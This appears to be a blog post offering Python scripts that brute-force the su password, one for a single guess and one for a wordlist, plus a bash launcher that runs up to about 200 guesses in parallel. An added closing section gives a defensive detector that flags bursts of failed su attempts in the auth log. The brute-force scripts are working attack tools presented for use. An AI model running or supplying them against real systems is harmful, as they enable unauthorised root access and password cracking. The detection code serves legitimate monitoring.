Here is a simple Python script (subruter-single.py) for su brute force that I made a few years ago. The script uses the pexpect library, which can be downloaded from here.
```python
#!/usr/bin/env python

# includes
import pexpect
import sys, getpass, os

# variables
COMMAND_PROMPT = '[$#] '
WRONGPASS1 = 'Sorry.'
WRONGPASS2 = 'su: incorrect password'

# main
if len(sys.argv) <= 1:
    print 'Usage: '
    print ' ./subruter password'
    sys.exit (1)

PASSWORD = sys.argv[1]

child = pexpect.spawn('/bin/su root')
child.expect('Password:')
child.sendline(PASSWORD)
i = child.expect([WRONGPASS1, WRONGPASS2, COMMAND_PROMPT])
if i == 0:
    print 'WRONG PASSWORD: ',PASSWORD
    sys.exit (1)
if i == 1:
    print 'WRONG PASSWORD: ',PASSWORD
    sys.exit (1)
if i == 2:
    print 'PASSWORD FOUND: ',PASSWORD
```
With wordlist support (subruter-wordlist.py):
```python
#!/usr/bin/env python

# includes
import pexpect
import sys, getpass, os

# variables
COMMAND_PROMPT = '[$#] '
WRONGPASS1 = 'Sorry.'
WRONGPASS2 = 'su: incorrect password'
USERNOTEXIST = 'su: user .*'

# main
if len(sys.argv) <= 2:
    print 'Usage: '
    print ' ./subruter username wordlist'
    sys.exit (1)

USERNAME = sys.argv[1]
WORDLIST = sys.argv[2]
RUNSU = '/bin/su ' + USERNAME

LINES = len(open(WORDLIST, 'rU').readlines( ))
print 'Reading', WORDLIST, '...'
print 'Found:', LINES, 'passwords.'

file = open(WORDLIST, "r")
while 1:
    line = file.readline()
    if not line:
        break
    PASSWORD = line.rstrip('\n')
    child = pexpect.spawn(RUNSU)
    a = child.expect([USERNOTEXIST, 'Password:'])
    if a == 0:
        print 'USER', USERNAME, 'DOES NOT EXIST!!!'
        sys.exit (1)
    if a == 1:
        print 'Trying password' , PASSWORD
        child.sendline(PASSWORD)
        i = child.expect([WRONGPASS1, WRONGPASS2, COMMAND_PROMPT])
        if i == 0:
            print 'WRONG PASSWORD!!!'
        if i == 1:
            print 'WRONG PASSWORD!!!'
        if i == 2:
            print 'PASSWORD FOUND: ',PASSWORD
            sys.exit (1)
```
In case you want to increase the speed you can use the following shell script (multi.sh):
```bash
#!/bin/bash

echo "MultiThread bruter"

if [ "$#" -lt 1 ]
then
    echo "Usage: /multi.sh wordlist-file"
    exit
fi

MAX="200"
LINES=`cat $1 | wc -l`
NUM="0"

echo "Found:" $LINES "passwords"

for PASSWORD in `cat $1`
do
    SURUNNING=`ps aux | grep "bin/su" | wc -l`
    ./subruter-single.py $PASSWORD >> su.log&
    NUM="$[NUM + 1]"
    if [ $SURUNNING -gt $MAX ]; then
        sleep 5
    fi
done
```
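Every wrong guess made by the scripts above is a separate failed su authentication, and on systems where su authenticates through pam_unix each one is written to the auth log. The following added example (not part of the original post) flags an invoking user who exceeds a failure threshold inside a sliding time window; the syslog line format, the sample lines, the thresholds and the name `find_su_bursts` are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed format: traditional syslog prefix followed by a pam_unix failure record for su.
FAILURE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ su(?:\[\d+\])?: "
    r"pam_unix\(su(?:-l)?:auth\): authentication failure;"
    r".*?\bruser=(?P<ruser>\S*).*?\buser=(?P<target>\S+)"
)

# Constructed sample lines (not from the page): alice fails six times in ten
# seconds, bob mistypes once and then opens a session.
SAMPLE_LOG = [
    f"Mar  3 10:15:{s:02d} host1 su[{4100 + s}]: pam_unix(su:auth): authentication failure; "
    "logname=alice uid=1000 euid=0 tty=/dev/pts/1 ruser=alice rhost=  user=root"
    for s in range(0, 12, 2)
] + [
    "Mar  3 10:20:00 host1 su[4200]: pam_unix(su:auth): authentication failure; "
    "logname=bob uid=1001 euid=0 tty=/dev/pts/2 ruser=bob rhost=  user=root",
    "Mar  3 10:20:09 host1 su[4201]: pam_unix(su:session): session opened for user root by bob(uid=1001)",
]


def find_su_bursts(lines, threshold=5, window=timedelta(seconds=60), year=2024):
    """Return {invoking_user: (target_user, peak_failures_in_window)} for bursts."""
    recent = defaultdict(deque)   # invoking user -> timestamps still inside the window
    alerts = {}
    for line in lines:
        m = FAILURE.match(line)
        if not m:
            continue              # successes and unrelated records are ignored
        # Syslog timestamps carry no year, so an assumed one is supplied.
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        q = recent[m["ruser"]]
        q.append(ts)
        while ts - q[0] > window:  # drop failures older than the window
            q.popleft()
        if len(q) >= threshold:
            peak = max(len(q), alerts.get(m["ruser"], (None, 0))[1])
            alerts[m["ruser"]] = (m["target"], peak)
    return alerts


if __name__ == "__main__":
    for user, (target, count) in find_su_bursts(SAMPLE_LOG).items():
        print(f"ALERT: {user} had {count} failed su attempts to {target} within the window")
```

A single mistyped password stays below the threshold, while the parallel runs started by multi.sh cross it within seconds.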
Feedback is always welcome!